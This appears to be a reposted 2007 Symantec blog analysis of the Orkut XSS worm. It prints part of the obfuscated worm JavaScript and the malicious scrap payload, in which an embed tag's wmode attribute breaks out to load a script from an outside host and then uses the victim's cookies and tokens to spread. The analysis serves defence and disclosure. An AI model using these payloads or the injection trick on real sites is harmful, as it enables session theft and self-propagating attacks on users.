Orkut XSS Worm的技术分析
来源:Ph4nt0m Google Group
Orkut is a popular social networking site with millions of registered users.
A couple of days ago Orkut was hit with a worm that impacted close to
700,000 users in approximately 24 hours. We took a closer look at the
exploit to get an idea of why so many users' systems were infected. The
exploit was contained in a JavaScript file, aptly named "virus.js file,"
which was injected using an embed tag. Here is a snippet of the JavaScript
file:
function $(p,a,c,k,e,d) { e=function(c) {
return(c35?String.fromCharCode(c+29):c.toString(36)) };
if(!''.replace(/^/,String)){ while(c–){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}]; e=function(){return'\\w+'}; c=1 }; while(c–){
if(k[c]){ p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) } } return p };
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?";
9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b
2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u,
1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5
3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c)
{5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5
f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1
f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5
3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};
G()}}};
7 V(){6(j==8.18("N").M){b};
…
We can see from the above code that the JavaScript is heavily obfuscated.
After decoding and analyzing the strings in the script we confirmed that it
is indeed targeting Orkut users. Our analysis of the decoded JavaScript
showed that when the virus.js script is executed it forces the user to join
a community called “Infectados pelo Vírus do Orkut”. The name of this
community is in Portuguese and translates to “Infected by Virus Orkut.”
This is a novel way for the author of the worm to keep track of accounts
infected by the worm. The script then loads the "friends list" of the
infected Orkut account and sends them a malicious scrap. The worm uses Orkut
scrap entries as its vector of propagation. Below is an example of the XML
code to define the Orkut scrap:
2008 vem ai… que ele comece mto bem par avc <br/> [silver]RL Wed Dec 19
14:57:48 UTC+0530 2007[/silver] <br/> <embed
src=http://www.orkut.com/LoL.aspx type= “application/x-shockwave-flash”
wmode=”transparent’); Script=document.createElement(‘script’);
Script.src=’http://files.myopera111.com/[REMOVED].js’;
Document.getElementByTagname(‘head’)[0].appendChild (script);escape(‘”
width=”1” height=”1”> </embed>
When you look at the code XML there are a few attributes for the embed tag,
such as wmode, width, height, etc. The embed tag expects these attributes in
order to create a flash object to display the flash content. Now when you
look closely at the code, notice the wmode attribute:
wmode=”transparent’);
The author has closed wmode with ‘); and has added some script code in the
attribute value itself. Let’s analyze this further. We tested the script
with a variant of the malicious scrap:
“<embed src="http://www.orkut.com/LoL.aspx"
type="application/x-shockwave-flash" wmode="transparent” width=”1”
height=”1”>”.
When Orkut parsed this scrapbook entry, we found it behaved in a similar way
to the following code in an Orkut page:
<script type="text/javascript"> var flashWriter = new
_SWFObject('http://www.orkut.com/LoL.aspx', '337533968', '1', '1', '9',
'#FFFFFF', 'autohigh', '', '', '337533968'); flashWriter._addParam('wmode',
'transparent'); flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv337533968');</script>
The Orkut application parsed the scrap text and created the flash object
with values specified in the scrap.
If we look at the source code of the malicious scrap it looks like the below
sample (the injected code is marked in bold and red). Note the escape
function is added to allow the malicious code to be integrated:
flashWriter._addParam ( 'wmode', 'transparent'); script =
document.createElement ( 'script'); script.src =
'http://files.myopera.com/virusd[REMOVED]'; document.getElementsByTagName (
'head') [0]. AppendChild script); escape (''); flashWriter._addParam (
'allowNetworking', 'internal'); flashWriter._addParam ( 'allowScriptAccess',
' never ');
Based on what we seen so far we can infer that the Orkut application filters
failed to parse this attribute in the request. It took the whole wmode value
as is and added it in the rendering code:
flashWriter._addParam('wmode', 'transparent'); (malicious script)
In this way the worm inserts a malicious script using the embed tag and uses
it for exploitation. Interestingly, a victim doesn’t need to click on the
scrap. When the scrapbook is loaded the malicious embed flash code loads the
virus.js file silently. The JavaScript takes the cookies and tokens of the
logged in user and uses it to spread the worm further.
This worm illustrates how a simple script injection exploit could affect a
large social networking site. Remember, users didn’t have to click anything
as the malicious script runs silently as soon as the page is loaded. This
worm could have been used for other malicious purposes, such as stealing
cookies, exploiting other vulnerabilities, or stealing sensitive data as
well.
As of today, the virus.js script is no longer available on the site and it
seems as if there have been adequate checks implemented by Orkut to validate
content when posting a scrap. The malicious scraps have also been deleted
from the scrapbook of the infected users.
Symantec has built a number of excellent Web browsing protections into our
2008 product range.
The worm is detected by Symantec's antivirus products with certified
definitions of 12/19/2007 rev. 7 and greater as JS.Woorkut
<http://www.symantec.com/security_response/writeup.jsp?docid=2007-1219…
3-99> . We recommend that you keep your Symantec products up-to-date, patch
your systems, and run your browser with limited options enabled.
Posted by Umesh Wanve on December 20, 2007 08:30 AM